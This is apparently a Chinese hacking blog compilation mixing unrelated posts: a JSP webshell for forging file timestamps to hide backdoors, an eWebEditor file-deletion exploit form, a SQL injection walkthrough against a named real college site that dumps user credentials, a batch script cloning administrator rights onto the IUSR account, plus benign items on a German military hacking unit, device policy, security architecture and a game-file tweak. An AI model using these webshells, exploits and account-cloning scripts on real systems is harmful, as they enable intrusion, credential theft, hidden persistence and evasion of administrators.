Chinadu's Blog

去这里下载：
http://lzm.backtrack4.cn

作者：oldjun

很多网站的管理员通过查看文件的修改时间定位被入侵后流下的网马与后门，因此修改文件的创建与修改时间可以有效的预防后门的泄露。

昨天研究了下，JSP只提供了修改“文件修改时间”的接口，却没有提供修改“文件创建时间”的接口，因此貌似只能修改“文件修改时间 ”，kj021320的JSP SHELL有这个功能，不过只能修改年月日，而且昨晚我遇到的RESIN 2.1.9 运行不了kj021320的那个SHELL，于是决定自己写个小的shell！

主要功能：
1.文件的时间属性查看，包括修改时间与创建时间；
2.文件修改时间的修改，精确到秒；

代码如下：
(Apache Tomcat/6.0.18下运行通过！)

   1. <%@ page import="java.io.*" %>  
   2. <%@ page import="java.util.*, java.text.*" %>  
   3. <%@ page language="java" import="java.util.Enumeration" contentType="text/html; charset=GB2312"%>  
   4.  
   5. <html>  
   6. <head>  
   7. <title>JSP timeshell by oldjun</title>  
   8. <meta http-equiv="Content-Type" content="text/html; charset=gb2312"></head>  
   9. <body>  
  10. <H1>JSP timeshell by oldjun</H1>  
  11. <%!  
  12. public static String getFileCreateDate(File _file) {  
  13.         File file = _file;  
  14.         try {  
  15.             Process ls_proc = Runtime.getRuntime().exec("cmd.exe /c dir \"" + file.getAbsolutePath() + "\" /tc");  
  16.             BufferedReader br = new BufferedReader(new InputStreamReader(ls_proc.getInputStream()));  
  17.             for (int i = 0; i < 5; i++) {  
  18.                 br.readLine();  
  19.             }  
  20.             String stuff = br.readLine();  
  21.             StringTokenizer st = new StringTokenizer(stuff);  
  22.             String dateC = st.nextToken();  
  23.             String time = st.nextToken();  
  24.             String datetime = dateC.concat(" "+time);  
  25.             br.close();  
  26.             return datetime;  
  27.         } catch (Exception e) {  
  28.             return null;  
  29.         }  
  30.     }  
  31. String folderReplace(String folder){  
  32.     return folder.replace('\\','/');  
  33. }  
  34. %>                                                                      
  35. <%  
  36. String action = null;  
  37. if (request.getParameter("action") == null)  
  38.         action = "main";  
  39.     else   
  40.         action = (String)request.getParameter("action");  
  41. if (action.equals("main")) {  
  42. %>  
  43. <form name= form1 method="post" action="?action=getinfo">  
  44. filepath:<input name="file" type="text" size="100" /><br>(for instance C:/Program Files/Apache Software Foundation/Tomcat 6.0/webapps/ROOT/time.jsp)<br>  
  45. <input type="submit" name="Button" value="getinfo"/>  
  46. </form>  
  47. <%  
  48. }else if (action.equals("getinfo")) {  
  49. String filepath = folderReplace(request.getParameter("file"));  
  50. File file = new File(filepath);  
  51. if(!file.exists()){  
  52.         out.println("<script lanugage=\"javascript\">alert(\"file:"+filepath+" not find!\");history.back();</script>");     
  53.     }  
  54. %>  
  55. filepath:<br>  
  56. <%=filepath%><br><br>  
  57. lastModifiedtime:<br>  
  58. <%=new Date(file.lastModified())%><br><br>  
  59. Createtime:<br>  
  60. <%  
  61. String Createtime=getFileCreateDate(file);  
  62. out.println(Createtime);  
  63. %><br><br>  
  64. now:<br>  
  65. <%  
  66. Date myDate = new Date();  
  67. out.println(myDate.toLocaleString());  
  68. %>  
  69. <form name= form2 method="post" action="?action=change">  
>  70. <input name="year" type="text" size="10"/>year  
  71. <input name="month" type="text" size="10"/>month  
  72. <input name="day" type="text" size="10"/>day  
  73. <input name="hour" type="text" size="10"/>hour  
  74. <input name="min" type="text" size="10"/>minute  
  75. <input name="sec" type="text" size="10"/>second  
  76. <input name="file" type="hidden" value="<%=filepath%>" /><br>  
  77. <input type="submit" name="Button" value="change"/>  
  78. </form>  
  79. <%  
  80. }else if (action.equals("change")) {  
  81. String url="?action=main";  
  82. String filepath = folderReplace(request.getParameter("file"));  
  83. String year = request.getParameter("year");  
  84. String month = request.getParameter("month");  
  85. String day = request.getParameter("day");  
  86. String hour = request.getParameter("hour");  
  87. String min = request.getParameter("min");  
  88. String sec = request.getParameter("sec");  
  89. File file = new File(filepath);  
  90. Calendar calendar=Calendar.getInstance();  
  91. calendar.set(Integer.parseInt(year),Integer.parseInt(month),Integer.parseInt(day),Integer.parseInt(hour),Integer.parseInt(min),Integer.parseInt(sec));  
  92. if(file.setLastModified(calendar.getTimeInMillis()))  
  93. out.println("<script lanugage=\"javascript\">alert(\"file date change success!\");location.href=\""+url+"\";</script>");  
  94. else 
  95. out.println("<script lanugage=\"javascript\">alert(\"time error!\");history.back();</script>");   
  96. }  
  97. %>  
  98. </body>  
  99. </html> 


灰白的头发,留着胡子,穿着一件蓝色的德国空军制服,这是德国官方黑客的典型形象,他叫弗里德里克·W·克里泽,今年60岁,准将,德国联邦国防军战略侦察队指挥官.
最近,一场特殊的战役引起了德国国防军的特别注意,克里泽受命“冲在最前线”,组建并培训了一支“黑客部队”,并计划在明年正式开始执行任务.这项任务对克里泽而言似乎最合适,他手下掌管着6000士兵,侦察队本身的运作与情报部门如出一辙.

在阿富汗成功网络监控

《明镜》周刊披露,在位于德国波恩市边上一座风景如画的小镇莱茵巴赫,有一个名叫图姆堡的兵营.克里泽和手下的76名“黑客士兵”正在里面忙碌地测试最新研发的针对敌方计算机网络的渗透、探测、操控甚至摧毁的方法.这支队伍有个听上去毫无恶意的官方名字——“信息和计算机网络操作部”,这些穿着制服的黑客的目标是要为网络突发情况做足准备,应对针对外部服务器和网络的数字攻击.

事实上,这支秘密部队早在3年前就开始组建了.当时,德国国防部长荣恩下令,要求联邦国防军为军方组建这样一支网络部队,也就是克里泽麾下的这76人.

这76名网络战士大部分毕业于德国联邦国防军下属大学的计算机专业.在上周二的一份报告中,克里泽骄傲地向总检察长沃尔夫冈·施奈德汗和陆海空三军高层阐述了这支部队取得的成功——其中包括在阿富汗执行的网络监控行动.随后,他讨论了这支极其秘密的队伍.克里泽的黑客部队已经准备好明年开始执行任务,届时这支部队将受命展示实力——在网络渗透试验中,对真实目标进行模拟攻击.

与犯罪分子手法相同

实际上,这支黑客部队使用的方法与犯罪分子手法相同.他们学习如何在其他用户毫无察觉的情况下向外部计算机上加载恶意软件,或通过电子邮件、外部光盘,甚或是在准备好的网址上通过简单的“网上冲浪”来完成任务.被感染的计算机进而下载其他恶意软件,如一个信件记录软件,可以读懂计算机上的所有按键,记录所有电子邮件信息、网址和密码.在不被察觉的情况下,这个攻击指令将各种信息传输到一个远程计算机上.

“莱茵巴赫士兵”的训练复杂和奇特.他们的模拟训练更像是科幻小说或是电脑游戏情节.克里泽的部下研究两大类黑客攻击——即“阻断服务”和“僵尸网络”攻击——这都是基于真实网络攻击情况的.

有专家称,这支秘密部队的曝光可能会在德国引起争议,因为根据德国基本法,联邦国防军只承担对外防御任务,而不能用于国内事务.

德国刑法2007年明文规定禁止网络攻击行动.如果政府网络部队在试验中攻击外部网络,严格来说,也算触犯刑法.法律还规定,实施破坏计算机网络行为的人,将被判处10年监禁.

作者：oldjun

这个漏洞可以很鸡肋，也可以很致命，关键看你怎么利用！

此漏洞存在于Example\NewsSystem目录下的delete.asp文件中，这是ewebeditor的测试页面，无须登陆可以直接进入，看这些代码：

‘ 把带”|”的字符串转为数组
Dim aSavePathFileName
aSavePathFileName = Split(sSavePathFileName, “|”)
‘ 删除新闻相关的文件，从文件夹中
Dim i
For i = 0 To UBound(aSavePathFileName)
‘ 按路径文件名删除文件
Call DoDelFile(aSavePathFileName(i))
Next


而aSavePathFileName是前面从数据库取出来的：

sSavePathFileName = oRs(”D_SavePathFileName”)


看看D_SavePathFileName是怎么添加到数据库里的，在addsave.asp(modifysave.asp)里：

sSavePathFileName = GetSafeStr(Request.Form(”d_savepathfilename”))
…
oRs(”D_SavePathFileName”) = sSavePathFileName


居然过滤了，是GetSafeStr函数，再看看这个函数，在Startup.asp里：

Function GetSafeStr(str)
GetSafeStr = Replace(Replace(Replace(Trim(str), “‘”, “”), Chr(34), “”), “;”, “”)
End Function


无 语，这不是过滤字符型注入的函数么？放这里什么用也没有啊！既然路径没有过滤，那就可以直接定义了，构造一个提交页面，其中 d_savepathfilename自己任意赋值(要删除多个文件，用|隔开即可)。试试../../eWebEditor.asp，提交后删除该新闻，于是主目录下的eWebEditor.asp不见了！

下面给出利用的htm：

<HTML><HEAD><TITLE>eWebEditor删除文件 by:oldjun(http://www.oldjun.com)</TITLE>
<style>body,p,td,input {font-size:9pt}</style>
</HEAD><BODY><a href='list.asp'>新闻列表</a> | <a href='add.asp'>增加新闻</a>

<b>增加新闻</b>

<form action="http://127.0.0.1/editor/Example/NewsSystem/addsave.asp"
method="post" name="myform">
<input type=hidden name=d_originalfilename>
<input type=hidden name=d_savefilename>
<table cellspacing=3 align=center>
<tr><td>要删的文件(相对路径就可以了)：</td>
<td><input type="text" name="d_savepathfilename" value="" size="90"></td>
</tr>
<tr><td>新闻标题(随便填)：</td>
<td><input type="text" name="d_title" value="" size="90"></td>
</tr>
<tr><td>标题图片：</td>
<td><select name="d_picture" size=1><option value=''>无</option></select>
当编辑区有插入图片时，将自动填充此下拉框</td>
</tr>
<tr><td>新闻内容(随便填)：</td>
<td><textarea name="d_content"></textarea></td>
</tr>
</table>

<input type=submit name=btnSubmit value=" 提 交 ">
<input type=reset name=btnReset value=" 重 填 ">
</form>
</BODY></HTML>


作者：指扣（c_fans）

过年了好忙 各种事情。
对待站我们应该耐心的去对待各种问题。包括以下出到的问题。
由于时间问题。作为版主拿出代表性的几点 希望为以后大家的技术有所帮助。

一 原理分析
我看看mysql5比之前增加的系统数据库information_schema的结构，它是用来存储数据库系统信息的
mysql> use information_schema;
Database changed
mysql> show tables;
+—————————————+
| Tables_in_information_schema |
+—————————————+
| CHARACTER_SETS |
| COLLATIONS |
| COLLATION_CHARACTER_SET_APPLICABILITY |
| COLUMNS |
| COLUMN_PRIVILEGES |
| KEY_COLUMN_USAGE |
| ROUTINES |
| SCHEMATA |
| SCHEMA_PRIVILEGES |
| STATISTICS |
| TABLES |
| TABLE_CONSTRAINTS |
| TABLE_PRIVILEGES |
| TRIGGERS |
| USER_PRIVILEGES |
| VIEWS |
+—————————————+
这里只挑注射中可以用到的几个表。
| SCHEMATA ――>存储数据库名的，
|——>关键字段：SCHEMA_NAME，表示数据库名称
| TABLES ――>存储表名的
|——>关键字段：TABLE_SCHEMA表示表所属的数据库名称；
TABLE_NAME表示表的名称
| COLUMNS ――>存储字段名的
|——>关键字段：TABLE_SCHEMA表示表所属的数据库名称；
TABLE_NAME表示所属的表的名称
COLUMN_NAME表示字段名
二 注入过程
1 版本号：1:版本号http://lrc.yorkcollege.ac.uk/subjects /display.php?id=64%20union%20select%201,2,3,4,unhex(hex(@@version)),6,7,8,9,10,11 /*（这里用hex unhex绕过错误）

2用户名：2：用户名http://lrc.yorkcollege.ac.uk/subjects/display.php?id=64%20union%20select%201,2,3,4,unhex(hex(user())),6,7,8,9,10,11/*

3数据库名：11:数据库库名：http://lrc.yorkcollege.ac.uk/subjects /display.php?id=64%20union%20select%201,2,3,4,unhex(hex(SCHEMA_NAME)),6,7,8,9,10,11%20from%20information_schema.SCHEMATA%20where%20SCHEMA_NAME%20like%20char(37,105,108,116,95,112,104,112,98,98,37)/* 这里我们找下phpbb的表段。（关键模糊查询，有些库名是很多的。甚至上百，模糊查询可以帮你找到你所希望的。例如：%pass% %phpbb%等有用的表）

4段名：4：段名http://lrc.yorkcollege.ac.uk/subjects /display.php?id=64%20union%20all%20select%201,2,3,4,unhex(hex(table_name)),6,7,8,9,10,11%20from%20information_schema.tables%20where%20table_schema=database() /*（这里直接利用查询=database查询与用户有关的段）

5：避免限制limit的：http://lrc.yorkcollege.ac.uk/subjects /display.php?id=64%20union%20all%20select%201,2,3,4,unhex(hex(table_name)),6,7,8,9,10,11%20from%20information_schema.tables%20where%20table_schema=database()%20and%20table_name%20!=%20char(117,115,101,114,115%20) /*（有些情况下limit是被限制的 之类我们可以采用！=来绕过）
6：username：http://lrc.yorkcollege.ac.uk/subjects /display.php?id=64%20union%20all%20select%201,2,3,4,unhex(hex(column_name)),6,7,8,9,10,11%20from%20information_schema.columns%20where%20table_name=char(117,115,101,114,115)%20limit%202,1/*
7：password：http://lrc.yorkcollege.ac.uk/subjects /display.php?id=64%20union%20all%20select%201,2,3,4,unhex(hex(column_name)),6,7,8,9,10,11%20from%20information_schema.columns%20where%20table_name=char(117,115,101,114,115)%20limit%206,1 /*（由于长度问题 这里显示不出来 经试验此表并不重要）
8 容错的：http://lrc.yorkcollege.ac.uk/subjects /display.php?id=-1%20union%09select%091,2,3,4,username,6,7,8,9,10,11%09from%09users /*（大家注意这条语句 很多情况下如果我们id=64 是不行的 这里64可换为-1 两外%20换为%09 多多注意哦 ）
9模糊查询：http://lrc.yorkcollege.ac.uk/subjects /display.php?id=64%20union%20all%20select%201,2,3,4,unhex(hex(table_name)),6,7,8,9,10,11%20from%20information_schema.tables%20where%20table_name%20like%20char(37,112,104,112,37)/*
10：结果：http://lrc.yorkcollege.ac.uk/subjects /display.php?id=64+union+select+1,2,3,4,unhex(hex(concat(username,0×3a,user_password))),6,7,8,9,10,11+from+ilt_phpbb.phpbb_users

时间关系 不再补充 关键字段已经爆出 。
用户密码也已经爆出。
关键在于大家对于MY SQL注入错误的一些对待问题。
希望此文可以帮助大家。

http://www.backtrack4.cn

BT4的镜像站点

下载地址：
http://download.backtrack4.cn/

移动设备管理规定

1、总则

1.1、目的

为了保证企业信息系统的安全、稳定、通畅运行，提高用户满意度，规范信息系统用户使用行为，特制定本规定。

1.2、释义

移动设备是指U盘、移动硬盘、笔记本电脑、PDA等可移动的并与企业发生信息交换的设备。（注：定义不一定准确，此处还需斟酌）

2、适用范围

本规定适用于企业员工和第三方外来人员在使用移动设备时所发生的管理活动。

3、移动设备的管理

1)  员工在使用移动设备时，应使用企业统一配备的U盘、移动硬盘、笔记本电脑等设备，如企业未统一配备的，在使用前应征得部门领导同意后方可使用。
2)  企业应对移动设备进行编号并登记，禁止将移动设备转借给他人使用，如需转借，必须登记，登记的内容应包括但不限于设备名称、设备编号、转借时间、归还时间、借出人、借用人等信息。借出的设备在进行登记后，产生的损失由借用人承担，如未进行登记，私自借给他人使用的，由此产生的一切后果由借出人承担。
3)  员工在企业工作区域外使用移动设备时，必须得到授权，防止企业的信息泄露。
4)  在公共场所使用移动设备时，必须妥善保管，在发生丢失、损坏的情况下，必须及时向上级领导反映。
5)  员工在使用移动设备时，必须始终遵守制造商有关保护设备的指南要求。
6)  员工应做好个人计算机的安全防护工作，安装相应的防病毒、防黑客软件，并关闭个人计算机的自动播放功能，防止在使用U盘、移动硬盘等设备时感染病毒（如Autorun.inf）。
7)  员工在使用U盘、移动硬盘时，必须对其进行病毒扫描，防止被感染病毒或木马等恶意程序。
8)  员工应通过数据加密、密码认证等方式对移动设备进行加密处理，防止非授权的访问。（注：感谢小志的建议）
9)  员工在使用笔记本电脑、PDA 等具有无线连接功能的设备时，如需接入无线网络，必须得到授权，禁止非法接入。
10)  对长期在工作区域外使用的设备应在保险公司进行投保，以转移风险。

4、罚则

     略.............，企业可根据自身的管理来制定相应的奖惩办法。

注： 红色  表示之后更新或修正的部分

PS：移动设备的管理总体说起来比较复杂，涉及的范围很广，比较难管理，有些企业是采取直接封锁 USB 端口来禁止使用 USB 等设备的，但这样的做法有点极端了，真正的安全使用移动设备，还要从管理上来解决并努力提高员工的安全意识，这样才能在保证能够正常使用USB 设备的同时兼顾安全。

一个企业如果需要建立信息安全体系架构，一般的流程如下：

1、分析企业的信息安全目标，即企业在未来的3-5年的安全目标是什么？在信息安全方面达到什么样的程度？

2、有了安全目标之后，下一步我们要做的就是分析企业目前的安全现状，此阶段一般通过风险评估等方式来实现，可选的方式有风险评估、安全审计、渗透测试等。

3、分析了安全现状，我们接下来要做的就是分析安全目标和安全现状之间的差距，目标有了，现状也清楚了，差距自然而然也就出来了。差距分析阶段主要是分析企业目前的安全现状和目标之间还存在哪些薄弱点，并一一列举出来，差距分析主要从组织安全、人员安全、访问控制、物理安全、安全事件、业务连续性等方面来展开。

4、在我们得到差距之后，我们就要为企业设计安全体系架构了，一套完整的信息安全体系架构，应包括技术体系架构和管理体系架构，技术体系架构主要是指从网络、系统层面来设计，譬如分析企业目前的网络架构是否合理？产品的部署是否到位？而管理体系架构主要是指信息安全的制度建设，俗话说 “无规矩不成方圆”，安全问题归根结底就是管理的问题，很多安全事件的发生都是因为管理不到位而产生的。譬如弱口令，如果企业的安全制度里有明确的要求，密码为6位，并应包括数字、字母、特殊字符等，这样完全是可以避免弱口令的现象，再譬如补丁更新不及时、ACL 做的不够等等诸如此类的问题，很大程度都是因为管理不到位。在我们的评估项目中，我们发现很多时候并不是技术上不可达，而是管理意识不到位。这里出现的比较多的是企业的高层领导的安全意识薄弱，对安全这一块基本没什么概念，对于管理员或安全部门提出的安全建议认为没有必要等等。很多安全的措施在很多企业都会出现实施难的问题，因为安全措施在很大程度上会给员工造成不便，员工都会出现抵触的情绪，在这种情况下，就需要公司的高层通过管理制度来推行安全措施，所以又归结到管理的问题上来。

对于企业来说，如上的这些现象一般出现在中小型企业，这些企业的资金比较缺乏，在公司没有出现大的安全事件的时候，公司高层一般是不考虑在安全方面加大投资的，而在大型企业，随着规模的不断壮大，网络已经成为这些企业不可缺少的部分，如果一旦出现安全事件，将会给企业造成严重的损失，如客户资料丢失、财务数据泄密、企业形象受损等等，而大型企业的资金也比较雄厚，在安全方面的投资也就相对较多了。

另外我们在设计信息安全体系架构时，应充分结合企业目前的安全现状和相关法律法规的要求，并应考虑企业的运营成本等问题，最后需要考虑就是信息安全体系架构设计的可执行性了，不能出现一套体系出来之后，发现根本没有联系企业目前的安全现状，方案的可执行性太差等问题。

5、在我们建立了信息安全体系架构之后，最后的阶段就是实施了。在实施中，还是需要企业高层的大力支持，才能顺利进行，因为信息安全体系架构的实施和运行，比如会跨越不同的部门，在部门与部门的协调上，就需要上层领导的协调了。

6、最后阶段就是 Check，信息安全体系架构应遵循 PDCA 的模型。我们应及时跟踪分析信息安全体系的建设情况，查漏补缺，及时发现不足和存在的问题，在后期的运行维护中及时修正。

首先我们需要下载一个工具ItemWDBEditor
http://www.rayfile.com/files/91b38da6-f697-11dd-8fa7-0014221b798a/

http://www.rayfile.com/files/91b38da6-f697-11dd-8fa7-0014221b798a/

在使用了这个东西有就要先进入World of Warcraft\Cache\WDB的文件夹里选择相对于的itemcache.wdb文件,你选择了中文语言就选zhCN里的itemcache.wdb,英文的话就选择enCN里的itemcache.wdb

然后就可以开始改了,步骤基本就是左边搜索自己装备,右边搜索你想改的装备,这里以瓦布改成怨灵为例

首先改最重要的显示代码,瓦布的是46982,怨灵的是36371,按一下旁边的[<<]按钮就能把数据更改了.当然还没改完,由于瓦布是匕首,如果你不希望你在用你的"怨灵"去砍人时像是用匕首的话,把子类别也改成单手剑吧,同样的按一下旁边的[<<]按钮就能把数据才能更改,至于携带动作,如果你是想把瓦布改蛋刀的话,就要改了.我们这次可以不管.最后按选项里的保存,就OK了,进去游戏里面吧,你会发现你的瓦布成了怨灵了,(不过在游戏选择人物时的装备还是没改之前)

当然这样还不能改WLK的模型,因为这个ItemWDBEditor不够强力,查不到WLK的装备的,怎么办?其实任何装备我们只要知道它的代码,在替换就可以改出来的了
我们只要到这个网站http://www.wowdb.cn/item-40396.html
查装备就会附带装备的ID,没错!这个就是可以用来改模型的代码.例如这里的逆潮的ID是56663,我们只要把瓦布的ID改成这个,再把武器子类型改成单手剑,改模型就成功了,其他装备如此类推

如果你不满意你改的模型,可以把你改的itemcache.wdb删除了,你下次进入游戏的时候系统会自己新建一个新的

牌子副手没安全感?改个蛋盾吧

其实就是注册表里复制管理员权限到普通用户那个操作,不过毕竟批处理容易在cmdshell里实现，贴出来吧
echo off
setlocal enabledelayedexpansion
echo %computername%
echo HKEY_LOCAL_MACHINE\SAM\SAM [1 17] >"%windir%\..\1.reg"
regini "%windir%\..\1.reg"
regedit /e "%windir%\..\1.reg" HKEY_LOCAL_MACHINE\SAM\SAM\Domains\Account\Users\Names\IUSR_%computername%
rem unicode ->ascii
type "%windir%\..\1.reg" >"%windir%\..\2.reg"
del /q "%windir%\..\1.reg"
rem find IUSR_%computername% 的对应id
for /F "delims=( tokens=1-5* skip=3" %%a in (%windir%\..\2.reg) do set iusr_id=%%b
del /q "%windir%\..\2.reg"
rem export administrator register
regedit /e "%windir%\..\1.reg" HKEY_LOCAL_MACHINE\SAM\SAM\Domains\Account\Users\000001F4
type "%windir%\..\1.reg" >"%windir%\..\2.reg"
del /q "%windir%\..\1.reg"
rem replace 1fx->iusr_id
for /f "tokens=* delims=:" %%i in (%windir%\..\2.reg) do (
for /f "tokens=*" %%j in ("%%i") do (
set TMP=%%j
set "TMP=!TMP:000001F4=00000%iusr_id:~0,3%!"
echo !TMP!>>%windir%\..\1.reg
)
)
regedit /s %windir%\..\1.reg
del /q %windir%\..\1.reg
del /q %windir%\..\2.reg
echo HKEY_LOCAL_MACHINE\SAM\SAM [17] >"%windir%\..\1.reg"
regini "%windir%\..\1.reg"
del /q "%windir%\..\1.reg"
net user IUSR_%computername% 12345678
克隆出来的用户名是固定的,随便变换的话要改代码

作者：mj0011

Tophet是一类Bootkit/Rootkit技术的统称，Tophet.a是其第一代的范本

在XCON2008上我RELEASE了这一样本的相关技术:

(http://xcon.xfocus.net/)

其中涉及的隐蔽BOOT启动、对象劫持技术、磁盘保护穿透技术均是过去我在内核研究和对抗中处于兴趣编写和探究的。

现在这些技术在我看起来已经稍微有些过时，不过仍是超过目前地上的一些公开的技术讨论的：）

其中对象劫持技术的代码已在过去的博文揭示过（http://hi.baidu.com/mj0011/blog/item/635e4d6076422ad88cb10d05.html）

这里的DOC来自XCON上的演讲稿，当时成文仓促，可能有笔误或疏漏，欢迎指正

下载地址：

http://mj0011.ys168.com

paper目录下的：高级Bootkit-tophet.rar